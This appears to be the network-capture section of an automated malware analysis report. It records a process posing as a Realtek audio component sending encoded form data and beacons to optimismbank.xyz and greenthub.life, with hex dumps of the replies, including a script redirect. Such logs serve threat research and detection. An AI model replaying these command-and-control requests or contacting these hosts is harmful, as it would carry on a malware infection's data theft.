                                                                            Data Ascii: 2O=uqdCK+O/4KmQYNBuZr+mznUbp+S+JVoNbo9/TzrCFJjHXEsKHZQRLjPJm7FbBdnS0YPi4X+vHbaBbaFyB4/HPYbmKaNEKTovuYhuJAd11dQYHLQBV4WCIuaLxAk2ML4rH3lYQBN9AZnCXUXEZAZT4Nks6OGVoxdokWYWANaCn2fkYhaFs0ruj402OC0YzffSTGIUVBsWL3aqckRLQLYTOf0=


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.11.204975213.248.169.48807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:55:16.407412052 CET7936OUTPOST /98j3/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.optimismbank.xyz
                                                                            Origin: http://www.optimismbank.xyz
                                                                            Referer: http://www.optimismbank.xyz/98j3/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 75 71 64 43 4b 2b 4f 2f 34 4b 6d 51 59 4e 42 75 5a 72 2b 6d 7a 6e 55 62 70 2b 53 2b 4a 56 6f 4e 62 6f 39 2f 54 7a 72 43 46 4a 72 48 58 32 6b 4b 48 34 51 52 4b 6a 50 4a 6c 37 46 57 42 64 6e 50 30 59 57 72 34 58 44 4e 48 59 69 42 5a 35 4e 79 52 4e 54 48 45 59 62 6d 58 4b 4e 51 4f 54 70 31 75 59 78 71 4a 41 4e 31 31 64 51 59 48 49 59 42 52 73 43 43 45 4f 61 49 34 67 6b 41 47 62 34 58 48 33 39 69 51 42 41 4b 41 4a 48 43 58 77 7a 45 4b 6a 78 54 6b 64 6b 55 35 4f 47 4e 6f 78 52 33 6b 57 55 30 41 4d 2b 6f 6e 30 2f 6b 4f 48 72 41 39 6c 62 6e 35 5a 67 4f 4c 78 38 56 77 34 6a 46 53 31 46 72 61 78 41 67 4b 48 44 36 57 43 63 41 44 65 4d 50 4b 66 56 58 73 4a 6c 37 32 6d 45 58 34 78 71 47 49 72 6b 2f 47 6e 73 53 48 71 35 69 74 4c 71 6d 70 63 58 45 4b 4f 70 73 6c 42 79 43 61 30 72 67 45 6f 75 4a 2b 47 45 68 45 53 33 32 30 5a 4e 30 4c 35 66 50 67 69 6d 4f 77 71 36 4a 50 39 35 49 45 56 4b 66 35 58 52 6c 62 57 38 4c 43 42 43 35 4d 47 6a 56 6e 32 45 41 47 37 6d 4d 56 6e 2f 4c 53 6c 66 6b 64 47 4d 7a 46 4a 49 [TRUNCATED]
                                                                            Data Ascii: 2O=uqdCK+O/4KmQYNBuZr+mznUbp+S+JVoNbo9/TzrCFJrHX2kKH4QRKjPJl7FWBdnP0YWr4XDNHYiBZ5NyRNTHEYbmXKNQOTp1uYxqJAN11dQYHIYBRsCCEOaI4gkAGb4XH39iQBAKAJHCXwzEKjxTkdkU5OGNoxR3kWU0AM+on0/kOHrA9lbn5ZgOLx8Vw4jFS1FraxAgKHD6WCcADeMPKfVXsJl72mEX4xqGIrk/GnsSHq5itLqmpcXEKOpslByCa0rgEouJ+GEhES320ZN0L5fPgimOwq6JP95IEVKf5XRlbW8LCBC5MGjVn2EAG7mMVn/LSlfkdGMzFJIoB+DdMUHxjAd/IrcZAFkczTrM8wJdx+XKiyhUSs1hVPWbwulxqFx+6gGkijvIkmiqLjr0dq7BW5HCesUrv3ucOspXXZB/3c8r5dyEXJ66hHWD5r81tCaYpDxmjRvo/jznd5QlP3W3WgCkpayzq3lKeLjuufb8kX+Evyfs9DvdZN2E1GrL5AnSSZO1j+a3CxOjy0eI1g3WLflByff25nPKUMckPXwtyC0z+e0l2MlazgFK24mqrKgu4zBJt/20mJR4n4kwf/OAO014VFnHnAygNqsv4mFMLZflHRe5P7ibMZJzVe3TVCMuMCUeWuY66oUSd2/zTuiTj0llxJRwJ7FvofojWrynWoD26bxcSSlZIFOZCtAk6NfZWA8JDC6uDZq1gyMV1JIenMv3tIi1B0yo4dzGVLsDXl4a+zuVBnO0RZw8xnt7XTtFA1N4/ZWRV9GIl0XR4oq6628K/8g3jnC1Ni/CTt4Buvs3rChlMKB6IEV41oWom/ClHe+SF1/jmfMLLYfnzjZ7rK7EGOtBCGyXsHxiUMkPfngf1l5A/EDz3x2egmN+Y7WsIm2DoShSQShSGG9wA242FyiERXmmQHsL93XLtd3ZZZQQpu17HxBLdxJt6JZ5BysBBFVl5b0KgNn3vXGeqgcNQ/5BNVc1f1Ln+q87a+u0UJvgY [TRUNCATED]


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.11.204975313.248.169.48807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:55:19.092852116 CET490OUTGET /98j3/?2O=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&ChhG6=J-xs HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.optimismbank.xyz
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:55:19.256767035 CET389INHTTP/1.1 200 OK
                                                                            Server: openresty
                                                                            Date: Tue, 03 Dec 2024 17:55:19 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 249
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 32 4f 3d 6a 6f 31 69 4a 4f 6e 6a 38 75 65 47 5a 50 4a 44 66 76 79 57 6d 68 68 58 34 62 47 41 4a 6a 74 31 44 64 74 53 61 43 53 51 4c 35 76 33 55 45 59 42 45 35 56 41 54 67 6e 71 67 75 39 79 43 59 58 55 31 71 54 38 31 55 47 32 48 62 4f 4c 51 4c 42 62 5a 4e 44 6f 4a 61 71 69 57 61 67 4c 61 51 34 4d 72 70 5a 56 4a 6e 46 34 77 37 77 2f 48 4b 55 32 62 61 4f 64 45 62 34 3d 26 43 68 68 47 36 3d 4a 2d 78 73 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?2O=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&ChhG6=J-xs"}</script></head></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.11.2049754209.74.77.109807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:55:24.661668062 CET761OUTPOST /r3zg/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.greenthub.life
                                                                            Origin: http://www.greenthub.life
                                                                            Referer: http://www.greenthub.life/r3zg/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 51 73 51 44 4e 37 4f 32 6d 76 6a 59 6e 6e 6a 4a 45 2f 79 42 66 74 61 34 77 30 36 48 34 47 72 78 65 6b 6a 6e 4a 4a 72 54 65 79 6a 46 36 48 4b 6e 73 79 4d 32 71 7a 76 70 61 76 32 6d 4d 4e 39 78 38 78 36 66 46 6e 42 54 52 59 58 61 59 51 69 65 48 4d 4f 69 2f 35 6f 38 76 4d 35 78 73 6a 43 76 41 4e 56 78 76 65 64 53 77 33 46 38 43 32 4c 62 6b 6d 6f 5a 36 63 33 63 2b 71 35 6b 44 6e 68 55 37 64 44 64 5a 63 47 67 59 6e 6c 44 43 45 58 44 72 6d 4b 37 44 68 62 73 5a 6b 77 64 36 39 43 79 52 59 51 78 33 4e 38 41 77 4f 79 49 61 73 2b 59 38 45 73 4b 5a 48 58 4f 75 4f 55 45 54 35 78 59 41 51 3d 3d
                                                                            Data Ascii: 2O=QsQDN7O2mvjYnnjJE/yBfta4w06H4GrxekjnJJrTeyjF6HKnsyM2qzvpav2mMN9x8x6fFnBTRYXaYQieHMOi/5o8vM5xsjCvANVxvedSw3F8C2LbkmoZ6c3c+q5kDnhU7dDdZcGgYnlDCEXDrmK7DhbsZkwd69CyRYQx3N8AwOyIas+Y8EsKZHXOuOUET5xYAQ==
                                                                            Dec 3, 2024 18:55:24.856693983 CET533INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:55:24 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.11.2049755209.74.77.109807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:55:27.374723911 CET781OUTPOST /r3zg/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.greenthub.life
                                                                            Origin: http://www.greenthub.life
                                                                            Referer: http://www.greenthub.life/r3zg/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 51 73 51 44 4e 37 4f 32 6d 76 6a 59 6d 47 54 4a 43 59 6d 42 64 4e 61 33 70 55 36 48 33 6d 72 39 65 6c 66 6e 4a 4e 37 44 65 41 48 46 36 6a 61 6e 74 7a 4d 32 6d 54 76 70 52 50 32 6a 52 64 39 2b 38 78 33 38 46 69 68 54 52 59 44 61 59 51 79 65 48 37 69 6a 2b 70 6f 69 6b 73 35 6b 79 54 43 76 41 4e 56 78 76 65 4a 6f 77 30 31 38 44 48 37 62 6c 44 46 72 6b 73 33 66 6f 36 35 6b 4f 48 68 51 37 64 44 6a 5a 65 6a 4e 59 68 70 44 43 47 66 44 72 58 4b 34 5a 78 62 71 64 6b 78 50 32 49 76 57 49 62 41 2f 37 66 78 54 38 63 36 64 53 61 7a 43 68 32 59 75 61 55 4c 38 71 2b 74 73 52 37 77 44 64 55 2f 6b 71 58 4a 77 47 34 75 68 57 5a 67 6e 53 62 46 53 5a 4a 63 3d
                                                                            Data Ascii: 2O=QsQDN7O2mvjYmGTJCYmBdNa3pU6H3mr9elfnJN7DeAHF6jantzM2mTvpRP2jRd9+8x38FihTRYDaYQyeH7ij+poiks5kyTCvANVxveJow018DH7blDFrks3fo65kOHhQ7dDjZejNYhpDCGfDrXK4ZxbqdkxP2IvWIbA/7fxT8c6dSazCh2YuaUL8q+tsR7wDdU/kqXJwG4uhWZgnSbFSZJc=
                                                                            Dec 3, 2024 18:55:27.571683884 CET533INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:55:27 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.11.2049756209.74.77.109807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:55:30.092909098 CET7930OUTPOST /r3zg/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.greenthub.life
                                                                            Origin: http://www.greenthub.life
                                                                            Referer: http://www.greenthub.life/r3zg/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 51 73 51 44 4e 37 4f 32 6d 76 6a 59 6d 47 54 4a 43 59 6d 42 64 4e 61 33 70 55 36 48 33 6d 72 39 65 6c 66 6e 4a 4e 37 44 65 41 50 46 37 52 53 6e 73 51 30 32 6f 7a 76 70 53 50 32 69 52 64 39 5a 38 78 76 67 46 69 6c 70 52 61 37 61 5a 7a 4b 65 42 50 32 6a 33 70 6f 69 72 4d 35 77 73 6a 43 41 41 4e 6c 31 76 65 5a 6f 77 30 31 38 44 45 54 62 68 57 70 72 6d 73 33 63 2b 71 35 34 44 6e 68 6f 37 64 4c 73 5a 65 6e 37 59 78 4a 44 48 57 50 44 70 46 69 34 53 78 62 6f 61 6b 77 4b 32 49 72 4a 49 62 64 47 37 65 45 4f 38 66 4b 64 52 37 61 41 31 79 63 54 45 6c 6a 30 6c 38 6c 44 52 4a 6f 39 64 55 6e 49 75 6c 4a 71 49 2b 69 51 49 70 30 71 49 72 74 54 45 73 42 69 4b 56 77 76 6c 4b 51 35 6c 4b 41 4a 45 43 78 73 4c 7a 6d 6a 74 75 44 52 31 47 7a 47 53 51 79 74 4d 47 41 56 43 2f 4d 6d 4a 71 4e 67 2f 54 71 6d 32 37 78 4c 70 32 76 62 2f 69 55 62 70 39 34 48 4f 4d 36 31 45 4e 6a 58 36 63 44 71 31 39 53 4b 55 57 2f 65 31 73 6e 54 4c 34 4b 72 62 6a 6a 69 56 41 67 67 44 4a 6c 67 4e 77 6a 2f 79 58 4b 4c 36 71 33 57 73 44 46 [TRUNCATED]
                                                                            Data Ascii: 2O=QsQDN7O2mvjYmGTJCYmBdNa3pU6H3mr9elfnJN7DeAPF7RSnsQ02ozvpSP2iRd9Z8xvgFilpRa7aZzKeBP2j3poirM5wsjCAANl1veZow018DETbhWprms3c+q54Dnho7dLsZen7YxJDHWPDpFi4SxboakwK2IrJIbdG7eEO8fKdR7aA1ycTElj0l8lDRJo9dUnIulJqI+iQIp0qIrtTEsBiKVwvlKQ5lKAJECxsLzmjtuDR1GzGSQytMGAVC/MmJqNg/Tqm27xLp2vb/iUbp94HOM61ENjX6cDq19SKUW/e1snTL4KrbjjiVAggDJlgNwj/yXKL6q3WsDFrQamS+3A+DqkC+A+4/AueFTbCzRjlbCIkVjYtR11q8SkeW9kFO+JEF2HQFvnjOJNlP/xZw2zAVULmpT0h6b9OAgOLgX/ArMQ2RmtcUun6IYP1YTMJwzxXrbfgFyK6aMbgZxigR6Z3n/ZTKnSKq2T1EWxGJsIZKn2ghnJUewetf0CbHlXByaHPbMYEHxVhcI/qXnc9b8c4XcMwz1gp2Zzn9eI+ZaNFyN6zbEDj3e/CycFr4NuFDHBqMl4MYEggAdeDazDv7h6lmwmId8No7OSr0Bch7jmfTBQDkm6g8gljmByHqN7kVOIGL3QfcnYncIJec+ASSovu3R2CrP33Yzqxcoui/m28lYDAZZZ9TjtrmDprTc3R8ez6JhdelD72gksBTPgFKAn3YY8VUBuBHrdDBKuMBXFeEyHC2m6FGFivrH7dDbFBIwxmiX6o2w5v8pLfn3AkdlBF5BJr7FsYdlnLKDpRjkKvXK84jgMiF6G3xBKfKv69BeYRw8797D7FwcsEzXpyNlfpXaIDJNfAiw1JcNBCSEkcSiVOMJ/rgdTaTLIqaO4wcsL9/OBbw+tBrvHu7KJfD/O4oqAjftwrDH5Zcxo/3nw0tVsQU1PczBggG3Y1oo5TutTA2gvTNAOmlGs25YUA+1NdX0eRkcW35hUbOSGGbp8FoBT/J [TRUNCATED]
                                                                            Dec 3, 2024 18:55:30.290868998 CET533INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:55:30 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            8192.168.11.2049757209.74.77.109807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:55:32.809967995 CET488OUTGET /r3zg/?ChhG6=J-xs&2O=du4jOMLkh7fLnmDtVoK+d8rG/j+33GGjaV3EKcXkS3D/yxi6pio40SubWtKrR6Fw1AeDGXhTcKeneAqCGOT0/aNCu6YrtTGBPMZlno0p/0xRAVz3vwpdvYc= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.greenthub.life
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:55:33.005325079 CET548INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:55:32 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            9192.168.11.204975823.225.159.42807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:55:39.284168005 CET6OUTData Raw: 50 4f 53 54
                                                                            Data Ascii: POST
                                                                            Dec 3, 2024 18:55:39.471441031 CET532INHTTP/1.1 200 OK
                                                                            Server: Apache
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Accept-Ranges: bytes
                                                                            Cache-Control: max-age=86400
                                                                            Age: 1
                                                                            Connection: Close
                                                                            Content-Length: 357
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                                            Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>
